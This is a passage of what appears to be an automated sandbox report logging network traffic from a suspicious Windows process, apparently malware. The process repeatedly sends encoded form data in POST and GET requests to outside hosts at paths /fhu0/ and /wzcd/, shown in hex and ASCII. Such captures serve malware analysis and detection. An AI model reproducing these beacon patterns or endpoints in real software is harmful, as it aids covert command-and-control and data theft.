                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.webuyfontana.com
                                      Content-Length: 208
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.webuyfontana.com
                                      Referer: http://www.webuyfontana.com/fhu0/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Raw: 54 54 76 38 32 4c 67 3d 39 39 66 38 4a 51 49 7a 66 4d 2f 4b 6b 55 4c 42 75 57 31 64 39 71 49 65 62 49 4e 31 66 49 36 63 44 36 4e 4f 72 31 69 39 41 6d 74 58 2b 67 32 7a 33 43 4b 71 75 6b 55 6b 50 6f 58 34 7a 6a 69 6a 2f 2b 44 39 2f 46 44 4e 5a 53 79 55 34 55 62 6e 61 4f 38 2f 35 6f 63 58 31 70 73 32 36 61 2f 47 67 6d 57 4e 4e 58 45 38 44 64 72 34 48 41 68 34 51 4d 34 78 62 78 72 54 72 41 69 4c 37 75 4e 49 38 6c 2b 4b 6c 36 4e 6b 74 47 30 4f 62 5a 53 66 67 35 62 47 2b 78 73 37 6c 69 52 65 32 4f 77 6b 2b 2f 4e 74 64 35 76 34 4e 4c 63 4d 6d 67 51 37 78 49 6b 49 49 30 47 30 32 30 30 4f 72 46 58 51 58 77 48 65 67 4e 49 3d
                                      Data Ascii: TTv82Lg=99f8JQIzfM/KkULBuW1d9qIebIN1fI6cD6NOr1i9AmtX+g2z3CKqukUkPoX4zjij/+D9/FDNZSyU4UbnaO8/5ocX1ps26a/GgmWNNXE8Ddr4HAh4QM4xbxrTrAiL7uNI8l+Kl6NktG0ObZSfg5bG+xs7liRe2Owk+/Ntd5v4NLcMmgQ7xIkII0G0200OrFXQXwHegNI=
                                      Jun 10, 2024 10:23:54.274609089 CEST294INHTTP/1.1 410 Gone
                                      Server: openresty
                                      Date: Mon, 10 Jun 2024 08:23:54 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 35 30 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 77 65 62 75 79 66 6f 6e 74 61 6e 61 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 7<html>9 <head>50 <meta http-equiv='refresh' content='0; url=http://www.webuyfontana.com/' />a </head>8</html>0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      50192.168.2.5514163.64.163.50802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:23:56.137962103 CEST746OUTPOST /fhu0/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.webuyfontana.com
                                      Content-Length: 228
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.webuyfontana.com
                                      Referer: http://www.webuyfontana.com/fhu0/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Raw: 54 54 76 38 32 4c 67 3d 39 39 66 38 4a 51 49 7a 66 4d 2f 4b 6c 77 50 42 68 56 74 64 78 61 49 52 55 6f 4e 31 55 6f 36 59 44 36 42 4f 72 30 58 32 42 55 35 58 2b 46 53 7a 32 47 6d 71 74 6b 55 6b 42 49 58 39 2b 44 69 71 2f 2b 48 31 2f 41 6a 4e 5a 53 4f 55 34 56 72 6e 61 35 6f 38 72 49 63 56 35 4a 73 30 6e 71 2f 47 67 6d 57 4e 4e 55 34 57 44 64 6a 34 48 7a 35 34 66 49 4d 32 53 52 72 51 69 67 69 4c 32 4f 4e 45 38 6c 2f 76 6c 37 52 43 74 44 77 4f 62 59 69 66 68 6f 62 46 72 68 73 39 71 43 51 62 2f 65 45 73 37 63 31 77 57 66 76 34 4d 39 63 32 71 32 39 52 72 71 73 67 62 55 71 4d 6d 6e 38 35 36 31 32 35 4e 54 58 75 2b 61 65 2f 68 44 43 77 63 34 31 6b 48 48 6b 44 2b 2f 59 6e 44 69 56 69
                                      Data Ascii: TTv82Lg=99f8JQIzfM/KlwPBhVtdxaIRUoN1Uo6YD6BOr0X2BU5X+FSz2GmqtkUkBIX9+Diq/+H1/AjNZSOU4Vrna5o8rIcV5Js0nq/GgmWNNU4WDdj4Hz54fIM2SRrQigiL2ONE8l/vl7RCtDwObYifhobFrhs9qCQb/eEs7c1wWfv4M9c2q29RrqsgbUqMmn856125NTXu+ae/hDCwc41kHHkD+/YnDiVi
                                      Jun 10, 2024 10:23:56.960325956 CEST294INHTTP/1.1 410 Gone
                                      Server: openresty
                                      Date: Mon, 10 Jun 2024 08:23:56 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 35 30 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 77 65 62 75 79 66 6f 6e 74 61 6e 61 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 7<html>9 <head>50 <meta http-equiv='refresh' content='0; url=http://www.webuyfontana.com/' />a </head>8</html>0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      51192.168.2.5514173.64.163.50802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:23:58.662898064 CEST1763OUTPOST /fhu0/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.webuyfontana.com
                                      Content-Length: 1244
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.webuyfontana.com
                                      Referer: http://www.webuyfontana.com/fhu0/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Raw: 54 54 76 38 32 4c 67 3d 39 39 66 38 4a 51 49 7a 66 4d 2f 4b 6c 77 50 42 68 56 74 64 78 61 49 52 55 6f 4e 31 55 6f 36 59 44 36 42 4f 72 30 58 32 42 55 42 58 2f 32 71 7a 33 6e 6d 71 73 6b 55 6b 4a 6f 58 38 2b 44 6a 6f 2f 36 72 78 2f 41 2f 33 5a 58 43 55 35 33 6a 6e 52 72 51 38 68 49 63 56 78 70 73 33 36 61 2f 54 67 6d 6d 4a 4e 58 41 57 44 64 6a 34 48 32 31 34 57 38 34 32 65 78 72 54 72 41 6a 4b 37 75 4e 6f 38 6b 61 53 6c 37 56 30 73 33 45 4f 62 34 79 66 6a 65 6e 46 32 52 73 2f 72 43 51 39 2f 65 5a 79 37 63 35 38 57 66 79 64 4d 36 51 32 76 51 63 4a 2f 4c 4d 34 4e 79 36 76 32 6d 77 55 72 41 53 43 4e 68 58 61 39 70 57 6d 75 77 6d 48 64 64 78 4a 52 6c 74 61 69 61 49 6e 4f 55 49 30 55 55 30 38 4e 79 48 38 6e 69 78 69 53 6c 34 4f 58 2b 73 42 6b 73 47 53 58 47 70 73 65 4a 37 56 44 66 6a 62 36 55 54 64 4f 52 38 4b 35 55 50 64 4c 4e 35 41 36 72 76 66 63 71 2f 44 47 42 48 4e 79 72 35 65 66 43 65 64 55 37 46 63 58 2b 6d 2b 49 42 41 33 67 74 30 77 6f 6c 62 36 67 76 74 6f 6b 76 59 6c 44 51 59 52 64 6b 62 41 2f 6c [TRUNCATED]
                                      Data Ascii: TTv82Lg=99f8JQIzfM/KlwPBhVtdxaIRUoN1Uo6YD6BOr0X2BUBX/2qz3nmqskUkJoX8+Djo/6rx/A/3ZXCU53jnRrQ8hIcVxps36a/TgmmJNXAWDdj4H214W842exrTrAjK7uNo8kaSl7V0s3EOb4yfjenF2Rs/rCQ9/eZy7c58WfydM6Q2vQcJ/LM4Ny6v2mwUrASCNhXa9pWmuwmHddxJRltaiaInOUI0UU08NyH8nixiSl4OX+sBksGSXGpseJ7VDfjb6UTdOR8K5UPdLN5A6rvfcq/DGBHNyr5efCedU7FcX+m+IBA3gt0wolb6gvtokvYlDQYRdkbA/lrUbjCoxft3X5z4aZLBXlDX7cvkga/OsXXto35eRTia1eK4Ff249CvoKBsyxXD9/JMT5JxVesifMUR1fgO8P4vviKsHrAiLSwKpde0t14yLMhY5qtEHKNAuPmLka0ab57d/0unWxK8yT58ejPa9a+O9ZA8kIK9HtU7Uf+2qSmDlWBwnka5lM+D0LAKP0HIQJL3/HRxUuj8Oo8n3dUrL3Oh1NJDrUA4RvxdVCUkjvG4zxsS03vhcLyXYvVrmViVLEbb1qSe6KTQUxUywlpLTo/P1RmoHPXZ0B4iTleq+NhLFBy0F+Prf/Sh8nVIwJJb0Z0iPviEZfQGA+mh6unyELIliKikcm955y+txy9X6KofX6x5Z8mY5ETirnNFIjcCqGBYzgqG8MuAtIxlOqJxa41qA5z4vsAq9MgNJ9UlVU9xZqoYHA7IrrviL9Ekn3WMxEpatnlNJCPLT6yuQKw+DjZ71DlGk4l0l00H4bmqDX5D5MGAdR1u6rOmhVicJKaSM9ISFxU7r93IWc/s0c11oAvh4rftizCAvTFzbNxS6gqTdO3jVm+oxlt0zOBthdAMDY5u5/tvStWzjyaGbOe9hBd11lPDUbNFkKIEvpJXzsH7jNAl9D46DTVTUIKlZmQbslEivHQWpvcgmM1rI4kvkfpHuFn1pxhNjX5kf [TRUNCATED]
                                      Jun 10, 2024 10:23:59.498358965 CEST294INHTTP/1.1 410 Gone
                                      Server: openresty
                                      Date: Mon, 10 Jun 2024 08:23:59 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 35 30 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 77 65 62 75 79 66 6f 6e 74 61 6e 61 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 7<html>9 <head>50 <meta http-equiv='refresh' content='0; url=http://www.webuyfontana.com/' />a </head>8</html>0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      52192.168.2.5514183.64.163.50802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:24:01.195677996 CEST459OUTGET /fhu0/?TTv82Lg=w/3cKlYOZ7/u5gm7pV9f/KUaDpReXY6iTJBfq3uhFW9siwux7V61qX9CS7/86gr+3Jfc1RyXdSHIkUzafqUvuKZrochJkYXYnzSwKE48OKXAFHRmaq8ieG3R1w7I9MISvw==&kH=00U8ENLHk HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.webuyfontana.com
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Jun 10, 2024 10:24:02.011998892 CEST294INHTTP/1.1 410 Gone
                                      Server: openresty
                                      Date: Mon, 10 Jun 2024 08:24:01 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 35 30 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 77 65 62 75 79 66 6f 6e 74 61 6e 61 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 7<html>9 <head>50 <meta http-equiv='refresh' content='0; url=http://www.webuyfontana.com/' />a </head>8</html>0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      53192.168.2.551419172.67.160.38802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:24:07.414326906 CEST738OUTPOST /wzcd/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.lunareafurniture.com
                                      Content-Length: 208
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.lunareafurniture.com
                                      Referer: http://www.lunareafurniture.com/wzcd/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Raw: 54 54 76 38 32 4c 67 3d 49 53 62 4d 36 77 43 79 79 52 70 36 4c 30 79 55 2f 79 6d 52 4d 66 35 33 6c 7a 51 6e 46 52 32 44 78 7a 4c 41 72 4e 69 6f 33 42 68 64 58 71 68 62 75 57 4a 43 4f 33 42 2b 46 72 68 63 37 50 74 4d 48 78 50 63 30 65 56 79 55 6b 44 36 44 57 6d 66 4a 4d 54 77 38 45 50 7a 71 72 65 6a 59 6f 46 4a 30 48 37 49 36 59 49 75 72 2f 34 74 48 76 4f 59 66 68 35 66 34 61 4b 4c 5a 38 4a 70 6a 75 68 74 70 52 4a 57 67 68 6b 77 78 75 66 75 6f 37 4b 41 2f 39 69 65 32 49 4d 52 54 77 43 52 67 46 44 6c 6a 69 66 35 67 48 4f 53 6f 4f 55 4f 75 36 66 41 75 73 73 4f 55 64 79 4f 78 73 51 56 31 30 66 49 52 53 6f 51 6d 57 67 3d
                                      Data Ascii: TTv82Lg=ISbM6wCyyRp6L0yU/ymRMf53lzQnFR2DxzLArNio3BhdXqhbuWJCO3B+Frhc7PtMHxPc0eVyUkD6DWmfJMTw8EPzqrejYoFJ0H7I6YIur/4tHvOYfh5f4aKLZ8JpjuhtpRJWghkwxufuo7KA/9ie2IMRTwCRgFDljif5gHOSoOUOu6fAussOUdyOxsQV10fIRSoQmWg=
                                      Jun 10, 2024 10:24:08.020169973 CEST876INHTTP/1.1 301 Moved Permanently
                                      Date: Mon, 10 Jun 2024 08:24:07 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Mon, 10 Jun 2024 09:24:07 GMT
                                      Location: https://www.lunareafurniture.com/wzcd/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WUsge%2FpCs6k8LdhGvJrFHP%2F%2FjdmI%2F7pDa5AxqsBo5gHJ7F6NpFxntNIt8NH%2BmR3a9e8sJLgyKKoCqazyDuomH%2FR%2B5q3%2FQX5uto%2B2NP9sQQej3Q%2B9InT2LFipqpLGVnj1vbbbE5YeJNUyTG8%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Vary: Accept-Encoding
                                      Server: cloudflare
                                      CF-RAY: 8917f699b85ae823-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      54192.168.2.551420172.67.160.3880
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:24:10.278191090 CEST758OUTPOST /wzcd/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.lunareafurniture.com
                                      Content-Length: 228
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.lunareafurniture.com
                                      Referer: http://www.lunareafurniture.com/wzcd/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Raw: 54 54 76 38 32 4c 67 3d 49 53 62 4d 36 77 43 79 79 52 70 36 4b 56 69 55 73 46 79 52 62 76 35 32 67 7a 51 6e 50 78 33 4b 78 7a 48 41 72 49 62 31 77 7a 46 64 55 50 4e 62 74 58 4a 43 4c 33 42 2b 4f 4c 67 57 31 76 74 39 48 78 44 55 30 62 74 79 55 67 6a 36 44 57 32 66 49 39 54 7a 39 55 4f 56 68 4c 65 68 57 49 46 4a 30 48 37 49 36 59 4d 49 72 37 63 74 45 65 2b 59 66 44 42 51 31 36 4b 45 65 38 4a 70 70 4f 68 70 70 52 4a 34 67 6b 45 65 78 73 58 75 6f 36 36 41 2b 6f 4f 5a 2f 49 4d 74 4e 77 44 67 78 6b 62 6f 71 6b 54 6a 70 47 6a 41 30 50 77 31 72 4d 79 71 30 4f 6b 6d 48 39 65 32 68 2f 59 69 6b 45 2b 68 4c 78 34 67 34 42 30 31 79 4d 47 4a 78 4d 38 48 43 6f 56 7a 59 59 48 52 45 61 34 50
                                      Data Ascii: TTv82Lg=ISbM6wCyyRp6KViUsFyRbv52gzQnPx3KxzHArIb1wzFdUPNbtXJCL3B+OLgW1vt9HxDU0btyUgj6DW2fI9Tz9UOVhLehWIFJ0H7I6YMIr7ctEe+YfDBQ16KEe8JppOhppRJ4gkEexsXuo66A+oOZ/IMtNwDgxkboqkTjpGjA0Pw1rMyq0OkmH9e2h/YikE+hLx4g4B01yMGJxM8HCoVzYYHREa4P
                                      Jun 10, 2024 10:24:10.864821911 CEST866INHTTP/1.1 301 Moved Permanently
                                      Date: Mon, 10 Jun 2024 08:24:10 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Mon, 10 Jun 2024 09:24:10 GMT
                                      Location: https://www.lunareafurniture.com/wzcd/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LcvDWxVob5twS9O6Fh445e8sms5EW4%2Bo%2BamINcI%2FjqbgPagfBqIYIdsnzENbbqLX0cXhP8Zb9ttHC%2BZVNPU3ig%2BaKxsix3Smudew6GKZtRX0gzBhlW9FL2PWiVaU8FKzhzLwXJZ7SyDHHsk%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Vary: Accept-Encoding
                                      Server: cloudflare
                                      CF-RAY: 8917f6ab7e92e5ea-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      55192.168.2.551421172.67.160.3880
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:24:12.804169893 CEST1775OUTPOST /wzcd/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.lunareafurniture.com
                                      Content-Length: 1244
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.lunareafurniture.com
                                      Referer: http://www.lunareafurniture.com/wzcd/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Raw: 54 54 76 38 32 4c 67 3d 49 53 62 4d 36 77 43 79 79 52 70 36 4b 56 69 55 73 46 79 52 62 76 35 32 67 7a 51 6e 50 78 33 4b 78 7a 48 41 72 49 62 31 77 7a 4e 64 55 35 5a 62 75 30 52 43 49 33 42 2b 42 62 67 56 31 76 74 6b 48 78 4c 59 30 62 52 49 55 69 62 36 52 46 75 66 42 76 37 7a 79 55 4f 56 38 62 65 67 59 6f 46 6d 30 47 4c 4d 36 59 38 49 72 37 63 74 45 64 57 59 59 52 35 51 7a 36 4b 4c 5a 38 4a 74 6a 75 68 52 70 52 42 4f 67 6b 41 67 77 63 33 75 6d 36 71 41 35 65 36 5a 77 49 4d 72 49 77 44 34 78 6b 6d 6f 71 69 33 76 70 47 57 56 30 4d 67 31 6f 61 7a 75 78 61 38 46 45 50 2b 4c 69 2f 6f 41 7a 7a 6e 46 46 44 77 71 30 43 45 51 36 50 2b 68 68 4c 51 37 50 4b 64 34 48 70 37 69 55 4d 6f 48 4a 61 47 55 75 2f 76 59 6c 57 2b 5a 58 6d 74 4a 64 65 51 4a 2f 36 4c 47 66 58 4a 35 69 30 6c 38 2f 76 7a 2f 47 70 47 69 71 6d 48 33 46 63 73 37 74 72 4d 6e 79 4f 62 61 6f 4c 31 34 56 2f 49 7a 57 62 32 75 76 4a 61 6b 4f 76 2b 68 4f 74 70 56 41 48 59 77 32 30 65 4c 71 63 4f 4d 4f 61 75 4d 66 72 32 54 55 6c 5a 4a 6d 45 64 4b 71 51 [TRUNCATED]
                                      Data Ascii: TTv82Lg=ISbM6wCyyRp6KViUsFyRbv52gzQnPx3KxzHArIb1wzNdU5Zbu0RCI3B+BbgV1vtkHxLY0bRIUib6RFufBv7zyUOV8begYoFm0GLM6Y8Ir7ctEdWYYR5Qz6KLZ8JtjuhRpRBOgkAgwc3um6qA5e6ZwIMrIwD4xkmoqi3vpGWV0Mg1oazuxa8FEP+Li/oAzznFFDwq0CEQ6P+hhLQ7PKd4Hp7iUMoHJaGUu/vYlW+ZXmtJdeQJ/6LGfXJ5i0l8/vz/GpGiqmH3Fcs7trMnyObaoL14V/IzWb2uvJakOv+hOtpVAHYw20eLqcOMOauMfr2TUlZJmEdKqQm2MdxqEXykQ8+x0PoMSHRKZasz4n72hxegz3+yR8r76hD6KhRU5IOUpjcaWxHsiYhFUVVdmIY8p6w6titVJf+a0/h401J7y1dhdN3ZebOUqZDuoM+vrK5JdvheGXU0a6hERJVwN4KoAjjpIHCHwit0cd8a9/WL0GUKAueFhW2u2DasYMQz8VfPAg4y6wavE9uR1/igmgz/rdGGYvOhFwwiEeG9+4++Zp50Mf6M5C0kPkm36OyOk2q02eTEWXVqgd+K+4ohAiFZLOqtsRi/VEtVJOd3Ua/zt9aTXQRDbmq0bRBRidW6YBiA393aa55nvWxoBSsVw0gm+IU9GNC07xpqgZhofnOjVECeXQavVP+rA4kveosnROgRA6V5mcHR8K9MZZoJ84RuX50mm2vxhT38+HWcJg6rEx6i9Sm0yYM8L/VTEIDAWS/O7ALwspjIrZ1JUH10ZIvW1NL4h24E/4oPe0MrPjB768jwNzzvKQ35TA+nDJUC7RXBtHDxStaI3++G9NQMhNMi5MGkrsRIKqoAlZVtsjKrnR93W8gnrxViHhyDHQb9i5orKEJk61ePOvEgppLJXqH1Q5WzeNAPDFYm4HRy8lC8MaxRjvdQpb1j/0+wFzUxHbmWL42KD/nOem0m8+jTnXcdsn+agdb7kCxTIVPxY8HWygB/ [TRUNCATED]
                                      Jun 10, 2024 10:24:13.422354937 CEST864INHTTP/1.1 301 Moved Permanently
                                      Date: Mon, 10 Jun 2024 08:24:13 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Mon, 10 Jun 2024 09:24:13 GMT
                                      Location: https://www.lunareafurniture.com/wzcd/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tkr%2FgyTBjiZFchZ0%2F6G96V%2F5z08xuIX8enxm96m3QDzNlVzJBS09MDoSGecgaFmlzLWgHn3dDBO7A2a4KWjw%2BC7oQJxnwAifzFmarncAcMu8LXd2kJORfw35bAJh19YJcx08fMRkOp3X3FQ%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Vary: Accept-Encoding
                                      Server: cloudflare
                                      CF-RAY: 8917f6bb7a4b6b27-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      56192.168.2.551422172.67.160.3880
                                      TimestampBytes transferredDirectionData
